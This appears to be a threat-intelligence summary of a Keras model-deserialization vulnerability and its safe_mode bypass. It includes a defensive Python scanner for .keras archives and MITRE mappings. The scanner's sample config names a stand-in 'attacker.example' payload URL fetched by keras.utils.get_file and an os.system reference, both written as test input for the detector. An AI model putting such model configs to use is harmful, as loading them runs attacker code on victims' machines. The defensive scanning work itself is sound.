A critical deserialization vulnerability (CVE-2024-3660) in the Keras deep-learning library (shipped with TensorFlow) lets an attacker run arbitrary code on any machine that loads a malicious Keras model file. Keras added a safe mode that refuses to deserialize Lambda layers carrying embedded code, but the JFrog write-up shows that this protection can still be bypassed, so loading an untrusted model remains equivalent to running untrusted code. The continued exposure underlines the need for stronger sandboxing and pre-load scanning in machine learning frameworks. Affected: Keras, TensorFlow, Machine Learning frameworks
Keypoints :
- CVE-2024-3660 allows arbitrary code execution when an untrusted Keras model file is deserialized (loaded).
- Malicious Keras model files can embed executable Python code in Lambda layers; the code runs as soon as the model is loaded.
- Keras v2.13 introduced a safe mode (the safe_mode flag of load_model) that refuses to deserialize Lambda layers containing embedded code.
- Safe mode blocks the original exploit, but bypasses remain in the Keras deserialization logic.
- A model config can reference functions from Python's standard library by name; the deserializer imports and calls them, which lets an attacker execute arbitrary commands even with safe mode on.
- Keras v3.9 attempts to restrict function loading to Keras' own modules, but Keras itself still exposes callables that can be abused (for example keras.utils.get_file, which downloads a file from an attacker-supplied URL).
- Regular security evaluation and scanning of machine learning models before they are loaded is crucial; a model file should be treated as code, not as data.
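The last three points describe what a pre-load scanner has to look for: Lambda layers, callables resolved from non-Keras modules (the pre-3.9 bypass), and Keras helpers such as keras.utils.get_file that are still dangerous after 3.9. The following is an added example written for this page, not code from JFrog or from the Keras project. It inspects the config.json inside a .keras archive without importing Keras at all, so nothing in the file can execute during the check. The sample archive is constructed inline; the JSON key layout (class_name, module, config, registered_name) follows the Keras 3 serialization format as the author understands it and is an assumption, as is the policy encoded in the two constants at the top.

```python
import io
import json
import zipfile

# Policy knobs (assumptions, not Keras settings): report every Lambda layer, report
# any serialized callable whose module is not part of Keras, and report Keras
# helpers that reach the network or filesystem. Only keras.utils.get_file is
# named in the JFrog post; extend the watch list as further sinks are found.
KERAS_MODULE_PREFIXES = ("keras.", "keras_core.", "tensorflow.keras.")
WATCHED_KERAS_CALLABLES = {"keras.utils.get_file"}


def _walk(node, path):
    """Depth-first walk of a JSON tree, yielding (json-path, dict) for every dict."""
    if isinstance(node, dict):
        yield path, node
        for key, value in node.items():
            yield from _walk(value, f"{path}/{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _walk(value, f"{path}[{index}]")


def _qualified_name(node):
    """Best-effort 'module.name' for a serialized callable node (layout assumed)."""
    cfg = node.get("config")
    name = cfg if isinstance(cfg, str) else node.get("registered_name") or "?"
    module = node.get("module") or ""
    return f"{module}.{name}" if module else name


def scan_config(config):
    """Return a list of (kind, json_path, detail) findings; an empty list means nothing matched."""
    findings = []
    for path, node in _walk(config, "config"):
        class_name = node.get("class_name")
        if class_name == "Lambda":
            cfg = node.get("config")
            layer_name = cfg.get("name", "?") if isinstance(cfg, dict) else "?"
            findings.append(("lambda_layer", path, layer_name))
        elif class_name == "__lambda__":
            # Marshaled Python bytecode inside the model: the case safe_mode was built to stop.
            findings.append(("embedded_bytecode", path, "marshaled code object"))
        elif class_name == "function":
            qualified = _qualified_name(node)
            if not qualified.startswith(KERAS_MODULE_PREFIXES):
                # The pre-3.9 bypass: a stdlib callable such as os.system resolved by name.
                findings.append(("non_keras_callable", path, qualified))
            elif qualified in WATCHED_KERAS_CALLABLES:
                # Allowed module, but a helper that still does something dangerous (the 3.9 gap).
                findings.append(("watched_keras_callable", path, qualified))
    return findings


def scan_keras_archive(data):
    """Scan config.json of a .keras (zip) archive without importing Keras or touching the weights."""
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        if "config.json" not in archive.namelist():
            raise ValueError("not a .keras archive: config.json missing")
        config = json.loads(archive.read("config.json"))
    return scan_config(config)


def build_sample_archive():
    """Constructed, deliberately suspicious .keras archive (no real weights); example input only."""
    config = {
        "module": "keras", "class_name": "Sequential",
        "config": {"name": "sequential", "layers": [
            {"module": "keras.layers", "class_name": "InputLayer",
             "config": {"batch_shape": [None, 4], "name": "input"}},
            # Keras-internal helper, but one that downloads from an attacker-chosen URL.
            {"module": "keras.layers", "class_name": "Lambda",
             "config": {"name": "fetch",
                        "function": {"module": "keras.utils", "class_name": "function",
                                     "config": "get_file", "registered_name": "get_file"},
                        "arguments": {"origin": "http://attacker.example/payload"}}},
            # Standard-library callable resolved by name (the pre-3.9 safe_mode bypass).
            {"module": "keras.layers", "class_name": "Lambda",
             "config": {"name": "shell",
                        "function": {"module": "os", "class_name": "function",
                                     "config": "system", "registered_name": "system"}}},
        ]},
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("metadata.json", json.dumps({"keras_version": "3.x"}))
        archive.writestr("config.json", json.dumps(config))
        archive.writestr("model.weights.h5", b"")
    return buf.getvalue()


if __name__ == "__main__":
    for kind, path, detail in scan_keras_archive(build_sample_archive()):
        print(f"{kind:24s} {path}  ->  {detail}")
```

Run the scanner on every model before load_model and reject anything with findings. It only recognises the node shapes listed above, so it complements rather than replaces loading with safe_mode=True inside a sandbox with no network access.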
MITRE Techniques :
- TA0002: Execution – A malicious Lambda layer or function reference in a Keras model file runs arbitrary code on the victim's machine when the model is deserialized.
- TA0011: Command and Control – Ingress Tool Transfer (T1105): keras.utils.get_file, invoked during deserialization, downloads a file from an attacker-supplied URL onto the victim's machine.
Indicator of Compromise :
- No IoC Found
Full Story: https://jfrog.com/blog/keras-safe_mode-bypass-vulnerability/